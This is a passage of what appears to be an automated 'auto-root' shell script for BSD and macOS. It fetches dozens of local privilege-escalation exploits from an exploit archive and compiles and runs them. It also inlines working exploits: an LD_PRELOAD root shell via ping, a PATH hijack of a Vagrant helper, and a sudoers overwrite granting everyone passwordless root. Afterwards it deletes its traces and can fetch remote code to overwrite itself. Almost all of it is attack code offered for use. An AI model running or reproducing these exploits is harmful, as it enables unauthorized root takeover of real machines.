wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/freebsd/local/9082.c -O exploit.c
ccmpl
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/freebsd/local/14002.c -O exploit.c
ccmpl
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/unix/local/19203.c -O exploit.c
ccmpl
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/bsd/local/3094.c -O exploit.c
ccmpl
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/bsd/local/19545.c -O exploit.c
ccmpl
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/bsd/local/286.c -O exploit.c
ccmpl
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/bsd/local/287.c -O exploit.c
ccmpl
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/freebsd/local/9488.c -O exploit.c
ccmpl
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/freebsd/local/26368.c -O exploit.c
ccmpl
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/freebsd/local/28718.c -O exploit.c
ccmpl
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/bsd/local/29.c -O exploit.c
ccmpl
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/openbsd/local/5979.c -O exploit.c
ccmpl
#sh
#py
#txt
#exploits/bsd/local/10255.txt
#!/bin/sh
echo ** FreeBSD local r00t zeroday
echo by Kingcope
echo November 2009
cat > env.c << _EOF
#include <stdio.h>
main() {
extern char **environ;
environ = (char**)malloc(8096);
environ[0] = (char*)malloc(1024);
environ[1] = (char*)malloc(1024);
strcpy(environ[1], "LD_PRELOAD=/tmp/w00t.so.1.0");
execl("/sbin/ping", "ping", 0);
}
_EOF
gcc env.c -o env
cat > program.c << _EOF
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
extern char **environ;
environ=NULL;
system("echo ALEX-ALEX;/bin/sh");
}
_EOF
gcc -o program.o -c program.c -fPIC
gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o -nostartfiles
cp w00t.so.1.0 /tmp/w00t.so.1.0
./env
checkroot
rm -rf env.c
rm -rf "env"
rm -rf program.c
rm -rf program.o
rm -rf w00t.so.1.0
#exploits/freebsd/local/19756.txt
asmon -e "xterm"
checkroot
#pl
}
function appx {
checkroot
echo
echo "R00Ting.. wait"
echo "apple"
#c
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/macos/dos/42056.c -O exploit.c
ccmpl
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/macos/local/40957.c -O exploit.c
ccmpl
#sh
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/macos/local/43221.sh -O exploit.sh
shcmpl
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/macos/local/43222.sh -O exploit.sh
shcmpl
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/macos/local/43223.sh -O exploit.sh
shcmpl
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/macos/local/43224.sh -O exploit.sh
shcmpl
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/macos/local/43225.sh -O exploit.sh
shcmpl
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/macos/local/43926.sh -O exploit.sh
shcmpl
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/macos/local/43217.sh -O exploit.sh
shcmpl
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/macos/local/43218.sh -O exploit.sh
shcmpl
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/macos/local/43219.sh -O exploit.sh
shcmpl
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/macos/local/43220.sh -O exploit.sh
shcmpl
#py
#txt
#exploits/macos/local/42334.txt
#!/bin/bash
vuln_bin=`find ~/.vagrant.d/ -name vagrant_vmware_desktop_sudo_helper_wrapper_darwin_amd64 -perm +4000 |tail -n1`
if [ "$vuln_bin" == "" ] ; then
echo "Vulnerable binary not found."
exit 1
fi
dir=`dirname "$vuln_bin"`
cd "$dir"
cat > ruby <<EOF
#!/bin/bash
echo
echo "************************************************************************"
echo "* Depressingly trivial local root privesc in the vagrant vmware_fusion *"
echo "* plugin, by m4rkw *"
echo "************************************************************************"
echo
echo "Shout out to #coolkids o/"
echo
bash
exit 0
EOF
chmod 755 ruby
VAGRANT_INSTALLER_EMBEDDED_DIR="~/.vagrant.d/" PATH=".:$PATH" ./vagrant_vmware_desktop_sudo_helper_wrapper_darwin_amd64
checkroot
#exploits/macos/local/42454.txt
#!/bin/bash
# WARNING: this scripts overwrites ~/.curlrc and /private/etc/sudoers (when successful)
#target=/Library/Frameworks/Xamarin.iOS.framework/Versions/10.6.0.10/share/doc/MonoTouch/apple-doc-wizard
target=/Library/Frameworks/Xamarin.iOS.framework/Versions/10.8.0.175/share/doc/MonoTouch/apple-doc-wizard
rm -rf ~/Library/Developer/Shared/Documentation/DocSets
cat << __EOF > /private/tmp/sudoers
%everyone ALL=(ALL) NOPASSWD: ALL
__EOF
cat << __EOF > ~/.curlrc
url=file:///private/tmp/sudoers
output=/private/etc/sudoers
__EOF
echo
echo "*** press CRL+C when the download starts ***"
$target
echo
sudo -- sh -c 'rm -rf /private/tmp/ios-docs-download.*; su -'
rm -f /private/tmp/sudoers ~/.curlrc
checkroot
#exploits/macos/local/40669.txt
wget --no-check-certificate https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40669.zip
unzip 40669.zip
cd 40669/
clang -O3 -o task_nicely_t task_nicely_t.c
./task_nicely_t
checkroot
cd ..
rm -rf 40669
rm -rf __MACOSX
rm -rf 40669.zip
#pl
echo
echo "Srry.. I tried hard, but no luck this time.. Wait for update :("
}
function al {
2x
sleep 1
3x
sleep 1
4x
sleep 1
bsdx
sleep 1
appx
}
function updt {
echo "updating script.."
wget -q --no-check-certificate https://raw.githubusercontent.com/nilotpalbiswas/Auto-Root-Exploit/master/autoroot.sh -O $0
sleep 2